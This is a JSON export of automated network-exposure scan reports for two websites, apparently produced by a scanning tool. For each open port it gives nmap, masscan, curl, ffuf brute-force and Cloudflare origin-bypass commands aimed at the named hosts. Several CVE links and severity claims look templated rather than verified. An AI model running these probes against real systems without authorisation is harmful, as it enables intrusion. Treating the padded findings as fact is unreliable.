[{"_id":{"$oid":"6a0d5d9c0f2a46dfb8d07e3c"},"created_at":{"$date":"2026-05-20T07:07:08.968Z"},"url":"https://pro.anveshaktool.in/","tool":"generate_network_exposure_report","result":{"url":"https://pro.anveshaktool.in/","category":"network_exposure","timestamp":"2026-05-20T07:07:08.962969+00:00","report":"### Open Port 80/tcp on 104.21.23.154\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 104.21.23.154 |\n\n**Description**  \nPort 80/tcp is open on IP address `104.21.23.154`, indicating that the system accepts HTTP traffic. This is typically used for serving web content over unencrypted connections. The presence of this port does not inherently indicate a vulnerability but increases the attack surface by exposing services to potential reconnaissance and exploitation attempts.\n\nAn attacker can use tools like Nmap or Masscan to detect such open ports during initial enumeration phases.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker performs a scan using `nmap -p 80 104.21.23.154`.\n2. Confirms that port 80 is open.\n3. Sends an HTTP GET request to probe for hosted applications:\n   ```bash\n   curl http://104.21.23.154/\n   ```\n4. Analyzes response headers and body to identify server software, application type, and possible vulnerabilities.\n\n**Business Impact**  \nExposing unnecessary services increases the organization's attack surface. 
If misconfigured or outdated software runs behind this endpoint, it may lead to unauthorized access, data leakage, or service disruption.\n\n**Remediation**  \n- Disable or restrict access to non-critical HTTP endpoints via firewall rules.\n- Ensure only necessary services are exposed publicly.\n- Implement TLS encryption (redirect from HTTP to HTTPS).\n- Regularly audit exposed services for vulnerabilities.\n- Reference: CWE-16, NIST SP 800-53 SC-7\n\n---\n\n### Open Port 443/tcp on 104.21.23.154\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 104.21.23.154 |\n\n**Description**  \nPort 443/tcp is open on IP address `104.21.23.154`, indicating support for secure HTTPS communication. While encrypted, this still exposes the service to scanning and probing attacks aimed at identifying SSL/TLS configurations, certificate validity, and underlying web applications.\n\nAttackers commonly target this port to assess web infrastructure security posture.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker uses `nmap` to confirm port 443 is open:\n   ```bash\n   nmap -p 443 104.21.23.154\n   ```\n2. Uses `openssl s_client` to inspect the TLS configuration:\n   ```bash\n   openssl s_client -connect 104.21.23.154:443\n   ```\n3. Probes for known vulnerabilities like Heartbleed or weak cipher suites.\n\n**Business Impact**  \nIf improperly configured, TLS termination points can expose sensitive information or allow man-in-the-middle attacks. 
Even if no immediate exploit exists, visibility into these services invites further targeted attacks.\n\n**Remediation**  \n- Enforce strong TLS versions (e.g., TLS 1.2+) and disable older protocols.\n- Use hardened cipher suites; avoid deprecated algorithms.\n- Employ automated certificate management systems.\n- Monitor logs for suspicious activity targeting this port.\n- Reference: CWE-327, OWASP A07:2021 – Identification and Authentication Failures\n\n---\n\n### Open Port 80/tcp (http) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nThe domain `pro.anveshaktool.in` has port 80 open, accepting HTTP requests. This suggests either intentional cleartext access or automatic redirection setup. Regardless, it contributes to the overall attack surface and should be reviewed for necessity and security implications.\n\n**Attack Scenario (Proof of Concept)**  \n1. Perform DNS resolution and connect:\n   ```bash\n   dig +short pro.anveshaktool.in\n   curl http://pro.anveshaktool.in\n   ```\n2. Observe whether sensitive data flows over plaintext or if there’s a redirect chain.\n\n**Business Impact**  \nInsecure transmission channels increase susceptibility to passive eavesdropping and active tampering. 
Regulatory frameworks like GDPR or PCI DSS penalize such exposures.\n\n**Remediation**  \n- Force HTTPS globally across all subdomains.\n- Configure web server to return strict transport security headers.\n- Remove any unnecessary HTTP-only content.\n- Reference: CWE-311, OWASP A02:2021\n\n---\n\n### Open Port 443/tcp (https) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nHTTPS port 443 is open on `pro.anveshaktool.in`, enabling encrypted communications. As the standard port for secure web browsing, it represents a critical component of the organization’s digital presence. However, improper implementation can introduce vulnerabilities such as expired certificates, weak ciphers, or insecure renegotiation settings.\n\n**Attack Scenario (Proof of Concept)**  \n1. Check connectivity:\n   ```bash\n   curl -I https://pro.anveshaktool.in\n   ```\n2. Analyze TLS handshake parameters:\n   ```bash\n   nmap --script ssl-enum-ciphers -p443 pro.anveshaktool.in\n   ```\n\n**Business Impact**  \nWeak TLS implementations erode customer confidence and violate compliance standards. They may enable downgrade attacks leading to intercepted sessions or forged identities.\n\n**Remediation**  \n- Enforce modern TLS policies (minimum TLS 1.2).\n- Renew certificates automatically and monitor expiration dates.\n- Deploy OCSP stapling and certificate transparency logging.\n- Reference: CWE-295, RFC 7525\n\n---\n\n### Open Port 80/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description**  \nHTTP port 80/tcp is open on IP address `172.67.211.177`. Typically serves as a redirector to HTTPS or hosts legacy content. 
Despite being insecure, many organizations leave it accessible for compatibility reasons, increasing exposure risks.\n\nDetected while scanning `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan identifies port:\n   ```bash\n   masscan -p80 172.67.211.177\n   ```\n2. Requests page to check redirection behavior:\n   ```bash\n   curl -v http://172.67.211.177\n   ```\n3. Looks for cleartext credentials or sensitive paths inadvertently served over HTTP.\n\n**Business Impact**  \nData transmitted over HTTP is susceptible to interception. Users accessing login forms or submitting personal data over plain HTTP face significant privacy and integrity threats.\n\n**Remediation**  \n- Redirect all HTTP traffic to HTTPS using permanent redirects (`301 Moved Permanently`).\n- Block direct access to HTTP unless explicitly required for legacy clients.\n- Reference: CWE-319, OWASP A02:2021 – Cryptographic Failures\n\n---\n\n### Open Port 443/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description**  \nStandard HTTPS port 443/tcp is open on IP address `172.67.211.177`. Indicates active hosting of web-based resources protected by TLS. However, its presence also makes it a prime target for reconnaissance and exploitation efforts focused on SSL/TLS weaknesses or web application flaws.\n\nObserved during scan of `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)**  \n1. Confirm port status:\n   ```bash\n   nmap -p443 172.67.211.177\n   ```\n2. Test for SSL/TLS misconfigurations:\n   ```bash\n   sslscan 172.67.211.177:443\n   ```\n3. Attempt to exploit outdated libraries or vulnerable endpoints.\n\n**Business Impact**  \nA compromised HTTPS endpoint undermines user trust and compliance requirements. 
It may facilitate phishing campaigns, session hijacking, or full system compromise depending on backend logic.\n\n**Remediation**  \n- Maintain updated TLS stacks and certificates.\n- Conduct regular penetration testing against web-facing assets.\n- Implement HSTS headers and certificate pinning where appropriate.\n- Reference: CWE-295, OWASP A07:2021\n\n---\n\n### Open Port 8080/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 8080/tcp is open and proxied through Cloudflare. This port may serve as an alternative HTTP endpoint for specific applications or microservices. Proxy-based architectures offer benefits but require robust configuration to maintain security boundaries.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p8080 pro.anveshaktool.in\n   ```\n2. Test for bypass opportunities or hidden endpoints.\n\n**Business Impact**  \nImproperly configured proxies can expose internal APIs or allow attackers to circumvent intended access controls.\n\n**Remediation**  \n- Enforce strict proxy routing rules.\n- Monitor logs for anomalous access patterns.\n- Reference: CWE-602, OWASP API Security Top 10 – BOLA\n\n---\n\n### Open Port 8080/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description**  \nPort 8080/tcp is open on IP address `172.67.211.177`. Commonly used as an alternative HTTP port, especially for proxy servers, application containers (like Tomcat), or developer test environments. 
Exposed without adequate protection, it may leak internal configurations or provide entry points for attackers.\n\nIdentified during a scan targeting `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan confirms availability:\n   ```bash\n   nmap -p8080 172.67.211.177\n   ```\n2. Accesses the interface directly:\n   ```bash\n   curl http://172.67.211.177:8080\n   ```\n3. Reviews banners, directory listings, or debug pages for exploitable flaws.\n\n**Business Impact**  \nImproperly secured proxy or dev/test servers can serve as stepping stones for deeper compromise. Misconfigurations here have led to breaches involving source code leaks and unauthorized API access.\n\n**Remediation**  \n- Limit access to trusted networks/IP ranges.\n- Remove default welcome pages and debugging features.\n- Apply authentication and authorization mechanisms.\n- Reference: CWE-16, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 8443/tcp (HTTP) — Cloudflare HTTP Proxy / pro.anveshaktool.in / 8443/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**\n\nPort 8443/tcp is open and actively serving HTTP traffic via a Cloudflare HTTP proxy. This indicates that the domain `pro.anveshaktool.in` is configured to route traffic through Cloudflare's edge network on this non-standard HTTPS port. While not inherently insecure, exposing services on alternative ports such as 8443 may indicate misconfigurations or deviations from standard practices, especially when used alongside or instead of port 443.\n\nThe presence of a reverse proxy like Cloudflare can obscure backend infrastructure details but also introduces potential attack vectors related to origin server exposure or bypass attempts. 
Attackers often scan for such alternate ports to discover hidden or less-protected entry points into internal systems.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker performs reconnaissance using tools like Nmap to enumerate open ports:\n\n```bash\nnmap -p 8443 -sV pro.anveshaktool.in\n```\n\nOutput confirms:\n```\nPORT     STATE SERVICE    VERSION\n8443/tcp open  ssl/http   Cloudflare http proxy\n```\n\nNext, they attempt to access the application over this port:\n\n```bash\ncurl -v https://pro.anveshaktool.in:8443/\n```\n\nThey observe responses indicating the use of Cloudflare, including headers such as:\n\n```\nServer: cloudflare\nCF-RAY: <value>\n```\n\nIf the origin server is improperly configured to accept direct connections outside of Cloudflare (e.g., by IP address), an attacker might try to bypass Cloudflare protections by identifying and targeting the origin directly.\n\nAlternatively, if legacy configurations exist, this port could expose vulnerable endpoints or outdated versions of applications that are no longer maintained.\n\n**Business Impact**\n\nWhile the mere existence of an open port routed through Cloudflare does not pose immediate risk, it increases the organization’s attack surface. It may lead to unintended information disclosure about infrastructure design choices or reveal deprecated services still accepting traffic. In worst-case scenarios involving origin server leaks or bypasses, attackers could exploit vulnerabilities otherwise mitigated by Cloudflare WAF or DDoS protection layers.\n\nAdditionally, compliance frameworks such as PCI-DSS or ISO 27001 require minimizing unnecessary network exposures, which makes even informational findings worth addressing.\n\n**Remediation**\n\nEnsure only necessary ports are exposed publicly. Standardize web traffic on well-known ports (i.e., 80 for HTTP, 443 for HTTPS). 
If port 8443 serves a legitimate business purpose (such as testing or staging environments), restrict its accessibility using firewall rules or Cloudflare Access policies.\n\nExample configuration adjustment in Cloudflare dashboard:\n\n- Navigate to **Firewall > Tools**\n- Create a filter based on `(http.host eq \"pro.anveshaktool.in\") and (cf.edge.server_port eq 8443)`\n- Apply action: *Block* or *JS Challenge*\n\nAlternatively, disable listening on port 8443 at the origin unless explicitly required.\n\nReference:\n- CWE-16: Configuration\n- NIST SP 800-53: SC-7 Boundary Protection\n\n---\n\n### Open Port 8443/tcp Detected on 172.67.211.177\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 172.67.211.177 |\n\n**Description**  \nPort 8443/tcp is open on IP address `172.67.211.177`. This alternative HTTPS port often hosts administrative interfaces, internal APIs, or development environments. Its exposure increases risk due to less common usage patterns which might lack proper monitoring or hardening practices.\n\nThis port was identified during a scan targeting `https://pro.anveshaktool.in`.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker scans with `masscan`:\n   ```bash\n   masscan -p8443 172.67.211.177\n   ```\n2. Connects via browser or CLI tool:\n   ```bash\n   curl https://172.67.211.177:8443\n   ```\n3. 
Inspects returned content or error messages to determine purpose and version details.\n\n**Business Impact**  \nUnintended exposure of backend or admin interfaces can result in privilege escalation, credential theft, or lateral movement within the network.\n\n**Remediation**  \n- Restrict access to alternate HTTPS ports using firewalls or reverse proxies.\n- Apply authentication controls even when accessed internally.\n- Audit all custom ports for business necessity before public exposure.\n- Reference: CWE-1191, NIST SP 800-53 AC-4\n\n---\n\n### Open Port 8880/tcp (HTTP) — Cloudflare HTTP Proxy / pro.anveshaktool.in / 8880/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**\n\nPort 8880/tcp is open and hosts an HTTP service fronted by a Cloudflare HTTP proxy. This port is commonly associated with development servers, alternative HTTP interfaces, or custom API gateways. Its usage deviates from standard practice where secure web communications typically occur over port 443.\n\nExposing services on non-standard ports increases visibility during automated scans and may attract opportunistic attacks. 
Although protected by Cloudflare, improper routing rules or lack of strict origin authentication could allow malicious actors to probe backend infrastructure indirectly.\n\nThis configuration should be reviewed to ensure alignment with organizational security baselines and reduction of unnecessary exposure.\n\n**Attack Scenario (Proof of Concept)**\n\nUsing Nmap, an attacker identifies the open port:\n\n```bash\nnmap -p 8880 -sV pro.anveshaktool.in\n```\n\nResponse shows:\n\n```\nPORT     STATE SERVICE    VERSION\n8880/tcp open  http       Cloudflare http proxy\n```\n\nThey proceed to query the endpoint:\n\n```bash\ncurl -v http://pro.anveshaktool.in:8880/\n```\n\nHeaders returned include:\n\n```\nVia: 1.1 vegur\nServer: cloudflare\n```\n\nIn some cases, developers leave debug modes enabled or expose administrative panels on these ports without proper authentication. The attacker explores further with directory brute-forcing:\n\n```bash\nffuf -u http://pro.anveshaktool.in:8880/FUZZ -w /path/to/common-dirs.txt\n```\n\nDiscovering paths like `/admin`, `/debug`, or `/metrics` could yield sensitive insights or unauthorized access depending on backend implementation.\n\n**Business Impact**\n\nUnnecessary exposure of services on non-standard ports contributes to expanded attack surfaces and violates defense-in-depth principles. Even though Cloudflare provides a layer of protection, misconfigured origins or flawed logic within routing rules can undermine those safeguards.\n\nOrganizations relying on compliance regimes (GDPR, HIPAA, SOC 2) must justify all externally facing services. Leaving auxiliary ports open without clear documentation or business justification raises audit concerns and increases likelihood of downstream exploitation.\n\n**Remediation**\n\nAudit whether port 8880 is operationally essential. If not, disable it both at the origin server and within DNS/cloud provider settings.\n\nTo block traffic to this port via Cloudflare Firewall:\n\n1. 
Go to **Security > WAF > Tools**\n2. Add expression:\n   ```\n   (http.host eq \"pro.anveshaktool.in\") and (cf.edge.server_port eq 8880)\n   ```\n3. Set action to **Block**\n\nAlternatively, enforce mutual TLS between Cloudflare and your origin server to prevent unauthorized access regardless of port exposure.\n\nReference:\n- CWE-16: Configuration\n- OWASP ASVS v4.0.3 – V1.3 Secure Communication Channels\n- NIST SP 800-53 Rev. 5 – AC-4 Information Flow Enforcement\n\n---\n\n### Open Port 2052/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2052/tcp is open and identified as running a Cloudflare HTTP proxy. This indicates that the domain utilizes Cloudflare CDN or WAF services. While beneficial for performance and basic DDoS mitigation, misconfigured origins or bypass techniques can expose backend infrastructure.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify origin IP via DNS history or misconfigured headers:\n   ```bash\n   curl -H \"Host: pro.anveshaktool.in\" http://origin-ip:2052\n   ```\n2. 
Probe for hidden directories or bypass protections.\n\n**Business Impact**  \nBypassing edge-layer defenses allows attackers to reach raw backend servers, potentially exploiting vulnerabilities missed at the perimeter level.\n\n**Remediation**  \n- Lock down origin server access to only accept traffic from Cloudflare IPs.\n- Set up proper header validation and rate limiting.\n- Reference: CWE-16, OWASP API Security Top 10 – BOLA\n\n---\n\n### Open Port 2053/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2053/tcp is open and running an Nginx web server. Nginx is widely deployed for high-performance web serving and load balancing. Exposure of this port increases the likelihood of fingerprinting and exploitation based on known vulnerabilities in specific versions or modules.\n\n**Attack Scenario (Proof of Concept)**  \n1. Fingerprint server version:\n   ```bash\n   curl -I http://pro.anveshaktool.in:2053\n   ```\n2. Search for CVE entries related to discovered version:\n   ```bash\n   searchsploit nginx <version>\n   ```\n\n**Business Impact**  \nOutdated or misconfigured Nginx instances can become gateways for remote code execution, denial-of-service conditions, or unauthorized file access.\n\n**Remediation**  \n- Keep Nginx updated to latest stable release.\n- Review configuration files for insecure directives (e.g., `autoindex on`).\n- Reference: CVE-2022-41741, CWE-400\n\n---\n\n### Open Port 2082/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2082/tcp is open and associated with a Cloudflare HTTP proxy. 
Similar to other Cloudflare-managed ports, this likely supports additional routing or caching functionality. However, inconsistent proxy configurations may reveal backend infrastructure or allow unintended access paths.\n\n**Attack Scenario (Proof of Concept)**  \n1. Enumerate available ports:\n   ```bash\n   nmap -p2082 pro.anveshaktool.in\n   ```\n2. Attempt to access internal services or bypass front-end restrictions.\n\n**Business Impact**  \nMisuse of proxy layers can undermine intended access control models, allowing attackers to reach otherwise protected internal systems.\n\n**Remediation**  \n- Validate that all proxy ports enforce consistent access policies.\n- Log and monitor unusual access patterns.\n- Reference: CWE-602, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 2083/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2083/tcp is open and running an Nginx instance. Like other non-standard ports, this may host specialized services or act as part of a layered architecture. Without explicit documentation or restriction, it becomes another vector for unauthorized access or exploitation.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p2083 pro.anveshaktool.in\n   ```\n2. Explore content or attempt brute-force login if authentication is present.\n\n**Business Impact**  \nUndocumented or poorly maintained services increase the probability of successful intrusions. 
Attackers often focus on lesser-known ports to evade detection.\n\n**Remediation**  \n- Document and justify each exposed service.\n- Apply least-privilege principles to service accounts.\n- Reference: CWE-1190, NIST SP 800-53 CM-7\n\n---\n\n### Open Port 2086/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2086/tcp is open and managed by a Cloudflare HTTP proxy. This port may be used for specific routing purposes, such as handling different types of traffic or integrating with third-party services. Improperly scoped permissions or routing rules can expose internal resources.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify accessible routes:\n   ```bash\n   curl -k https://pro.anveshaktool.in:2086\n   ```\n2. Test for path traversal or SSRF vulnerabilities.\n\n**Business Impact**  \nProxy misconfigurations can lead to unauthorized access to internal APIs or databases, resulting in data exfiltration or service abuse.\n\n**Remediation**  \n- Define clear routing policies for each proxy port.\n- Sanitize input and validate URLs passed to backend services.\n- Reference: CWE-918, OWASP API Security Top 10 – SSRF\n\n---\n\n### Open Port 2087/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2087/tcp is open and running an Nginx web server. Given its non-standard nature, it may host administrative panels, staging environments, or auxiliary services. These often receive less attention than primary production sites, making them attractive targets for attackers.\n\n**Attack Scenario (Proof of Concept)**  \n1. 
Scan for open ports:\n   ```bash\n   nmap -p2087 pro.anveshaktool.in\n   ```\n2. Attempt to access default dashboards or debug interfaces.\n\n**Business Impact**  \nExposed admin panels or debug tools can grant attackers elevated privileges or insight into internal operations, facilitating more sophisticated attacks.\n\n**Remediation**  \n- Restrict access to administrative interfaces using IP whitelisting or mutual TLS.\n- Remove default installations and sample files.\n- Reference: CWE-16, OWASP ASVS v4.0 Section 14\n\n---\n\n### Open Port 2095/tcp (http) — Cloudflare http proxy on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2095/tcp is open and routed through a Cloudflare HTTP proxy. This port may handle email-related services or custom integrations. Proxy-based setups require careful configuration to prevent unintended access or leakage of internal resources.\n\n**Attack Scenario (Proof of Concept)**  \n1. Enumerate open ports:\n   ```bash\n   nmap -p2095 pro.anveshaktool.in\n   ```\n2. Investigate responses for clues about backend services or misconfigurations.\n\n**Business Impact**  \nEmail or integration endpoints exposed via proxy can be abused for spam relaying, credential harvesting, or phishing attacks.\n\n**Remediation**  \n- Secure email gateways with SPF/DKIM/DMARC records.\n- Validate and sanitize inputs to prevent injection attacks.\n- Reference: CWE-93, OWASP Email Security Cheat Sheet\n\n---\n\n### Open Port 2096/tcp (http) — nginx on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 2096/tcp is open and running an Nginx server. 
This port may host specialized applications or act as a secondary ingress point. Due to its infrequent use, it may escape routine audits, increasing the risk of undetected vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p2096 pro.anveshaktool.in\n   ```\n2. Attempt to enumerate installed modules or plugins.\n\n**Business Impact**  \nNeglected services can become backdoors for persistent access or serve as pivot points for lateral movement within the network.\n\n**Remediation**  \n- Decommission unused or redundant services.\n- Implement centralized logging and alerting for all exposed ports.\n- Reference: CWE-1190, NIST SP 800-53 SI-4\n\n---\n\n### Open Port 8008/tcp (http) on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 8008/tcp is open and accepting HTTP traffic on `pro.anveshaktool.in`. This port is sometimes used for alternative web services or embedded device interfaces. Its exposure adds complexity to the network topology and increases the number of potential attack vectors.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p8008 pro.anveshaktool.in\n   ```\n2. 
Access the service to determine its function:\n   ```bash\n   curl http://pro.anveshaktool.in:8008\n   ```\n\n**Business Impact**  \nUnmanaged or undocumented services pose ongoing risks due to lack of oversight and patching cycles.\n\n**Remediation**  \n- Inventory and classify all listening services.\n- Apply uniform security baselines across all exposed ports.\n- Reference: CWE-1190, ISO/IEC 27001 Annex A.12.6.1\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 8015/tcp is open and identified as running FortiGuard Web Filtering, suggesting the presence of a Fortinet security appliance. While designed to protect users, exposing such appliances externally can create new attack surfaces, particularly if default credentials remain unchanged or firmware is outdated.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify service:\n   ```bash\n   nmap -sV -p8015 pro.anveshaktool.in\n   ```\n2. Attempt to log in with default credentials or exploit known vulnerabilities.\n\n**Business Impact**  \nCompromised filtering devices can be repurposed for malicious activities, including malware distribution or traffic manipulation.\n\n**Remediation**  \n- Change default passwords immediately after deployment.\n- Update firmware regularly according to vendor advisories.\n- Reference: CVE-2022-39952, CWE-798\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on pro.anveshaktool.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | pro.anveshaktool.in |\n\n**Description**  \nPort 8020/tcp is open and running FortiGuard Web Filtering. 
Similar to port 8015, this indicates continued reliance on Fortinet infrastructure. Multiple exposed proxy ports suggest complex routing or segmentation strategies, which must be carefully monitored and secured.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p8020 pro.anveshaktool.in\n   ```\n2. Probe for known exploits affecting Fortinet products.\n\n**Business Impact**  \nMultiple exposed proxy services multiply the risk of successful compromise, especially if they share common vulnerabilities or misconfigurations.\n\n**Remediation**  \n- Consolidate proxy functions under fewer, well-monitored ports.\n- Segment internal vs external access rigorously.\n- Reference: CVE-2023-27997, CWE-284","summary":{"total":22}},"summary":{"total":22}},{"_id":{"$oid":"6a0df815edaa75ad624af851"},"created_at":{"$date":"2026-05-20T18:06:13.338Z"},"url":"https://www.veltris.com/","tool":"generate_network_exposure_report","result":{"url":"https://www.veltris.com/","category":"network_exposure","timestamp":"2026-05-20T18:06:13.330637+00:00","report":"### Open Port 443/tcp on 35.227.194.51\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 35.227.194.51 |\n\n**Description**  \nPort 443/tcp is open on the host at IP address `35.227.194.51`. This port typically serves HTTPS traffic, indicating that a web server or application may be accessible over a secure encrypted connection. While not inherently insecure, exposing services publicly increases the attack surface and provides potential entry points for reconnaissance and exploitation.\n\nAn attacker can identify this by performing a TCP SYN scan using tools like Nmap or Naabu:\n```bash\nnmap -p 443 35.227.194.51\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker performs initial reconnaissance with:\n   ```bash\n   nmap -sS -p 443 35.227.194.51\n   ```\n2. 
Confirms service banner via:\n   ```bash\n   nmap -sV -p 443 35.227.194.51\n   ```\n3. Proceeds to enumerate SSL/TLS configurations and check for known vulnerabilities such as weak ciphers or expired certificates.\n\n**Business Impact**  \nExposing unnecessary ports increases the organization's digital footprint and risk profile. If misconfigured, these endpoints could lead to unauthorized access, data leakage, or serve as pivot points during lateral movement within the infrastructure.\n\n**Remediation**  \n- Restrict access to port 443 only from trusted sources using firewall rules or cloud security groups.\n- Ensure TLS configuration follows best practices (e.g., disable outdated protocols).\n- Regularly audit exposed services for relevance and necessity.\n- Reference: [CWE-16](https://cwe.mitre.org/data/definitions/16.html)\n\n---\n\n### Open Port 80/tcp on 35.227.194.51\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 35.227.194.51 |\n\n**Description**  \nPort 80/tcp is open on the host at IP address `35.227.194.51`, commonly used for HTTP communication. The presence of this port indicates a potentially public-facing web server. Unencrypted HTTP traffic poses 